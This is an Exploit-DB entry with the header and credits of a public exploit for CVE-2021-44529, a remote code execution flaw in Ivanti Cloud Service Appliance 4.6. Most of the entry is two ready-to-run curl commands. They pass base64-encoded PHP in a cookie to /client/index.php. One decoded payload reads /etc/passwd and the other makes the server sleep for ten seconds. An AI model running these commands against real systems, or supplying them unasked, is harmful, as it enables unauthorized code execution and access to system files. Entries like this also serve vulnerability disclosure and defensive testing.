Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)

EDB-ID:

50833


Author:

d7x

Type:

remote


Platform:

Multiple

Date:

2022-03-22


# Exploit Title: Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)
# Date: 20/03/2022 
# Exploit Author: d7x 
# Vendor Homepage: https://www.ivanti.com/ 
# Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6 
# Version: CSA 4.6 4.5 - EOF Aug 2021 
# Tested on: Linux x86_64
# CVE : CVE-2021-44529

###
This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz): 
https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US

Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies

@d7x_real
https://d7x.promiselabs.net
https://www.promiselabs.net
###

# cat /etc/passwd
curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo

# sleep for 10 seconds
curl -i -s -k -X $'GET' -b $'e=ab; exec=c2xlZXAoMTApOw==; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo